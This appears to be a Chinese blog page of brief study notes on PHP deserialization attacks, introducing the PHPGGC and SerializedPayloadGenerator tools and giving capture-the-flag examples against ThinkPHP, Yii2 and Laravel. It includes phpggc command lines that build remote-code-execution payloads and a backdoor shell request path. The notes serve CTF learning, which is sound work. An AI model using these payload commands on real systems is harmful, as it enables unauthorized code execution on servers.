当前位置: 首页 > news >正文

PHP 反序列化CLI 框架类PHPGGC 生成器TPYiiLaravel 等利用

# 反序列化链项目 -PHPGGC&NotSoSecure
-NotSoSecure
https://github.com/NotSoSecure/SerializedPayloadGenerator
为了利用反序列化漏洞,需要设置不同的工具,如 YSoSerial(Java)
YSoSerial.NET PHPGGC 和它的先决条件。 DeserializationHelper 是包含对
YSoSerial(Java) YSoSerial.Net PHPGGC 和其他工具的支持的 Web 界面。使
Web 界面,您可以为各种框架生成反序列化 payload.
Java – YSoSerial
NET – YSoSerial.NET
PHP – PHPGGC
Python - 原生
-PHPGGC
https://github.com/ambionics/phpggc
PHPGGC 是一个包含 unserialize() 有效载荷的库以及一个从命令行或以编程方式生成
它们的工具。当在您没有代码的网站上遇到反序列化时,或者只是在尝试构建漏洞时,此
工具允许您生成有效负载,而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看
作是 frohoff ysoserial 的等价物,但是对于 PHP 。 目前该工具支持的小工具链
包括: CodeIgniter4 Doctrine Drupal7 Guzzle Laravel Magento
Monolog Phalcon Podio ThinkPHP Slim SwiftMailer Symfony
Wordpress Yii ZendFramework 等。
# 反序列化框架利用 -ThinkPHP&Yii&Laravel
[ 安洵杯 2019]iamthinking Thinkphp V6.0.X 反序列化
./phpggc ThinkPHP/RCE4 system 'cat /flag' --url
CTFSHOW 反序列化 267 Yii2 反序列化
弱口令登录 / 源码提示泄漏
GET index.php?r=site%2Fabout&view-source
GET /index.php?r=backdoor/shell&code=
./phpggc Yii2/RCE1 exec 'cp /fla* tt.txt' --base64
CTFSHOW 反序列化 271 Laravel 反序列化
./phpggc Laravel/RCE2 system "id" --url
#Thinkphp 反序列化链分析
Thinkphp-All-vuln-main

相关文章:

  • 设计模式之策略模式
  • nginx实现同一个端口监听多个服务
  • 用Python爬取B站热门视频并自动保存到本地
  • Java多线程的暗号密码:5分钟掌握wait/notify
  • AutoGPT超详细教程
  • 服务器数据恢复—双循环RAID5数据恢复揭秘
  • Java Web容器分类及对比
  • BSTREE(二叉搜索树)的介绍与模拟实现
  • 【Nova UI】八、打造组件库第一个组件-图标组件(上):图标组件开发实战攻略
  • 【Java后端】MyBatis 与 MyBatis-Plus 如何防止 SQL 注入?从原理到实战
  • 锁存器知识点详解
  • Java基础第21天-正则表达式
  • Redis高频核心面试题
  • 网络安全职业技能大赛Server2003
  • ECharts 关系图表开发指南与 Vue3 组件封装
  • 杂谈-有感而发
  • LOAM的原理分析,源码解读,和运行调试
  • 接口测试和功能测试详解
  • SQL Server 2022 常见问题解答:从安装到优化的全场景指南
  • 使用 JUnit 4在 Spring 中进行单元测试的完整步骤
  • 920余名在缅甸当阳等地实施跨境电信网络诈骗的中国籍犯罪嫌疑人被移交我方
  • 美学术界发起集体抗议,百余高校联署声明抵制政府干预
  • 旁白丨无罪后领到国家赔偿,一位退休教师卸下了“包袱”
  • 去年净流入人口达45万,居各省份第一:浙江带来哪些启示?
  • 现货黄金价格站上3400美元,今年迄今累涨逾29%
  • 上海市政府常务会议部署多措并举促进消费,提高居民收入,减轻家庭负担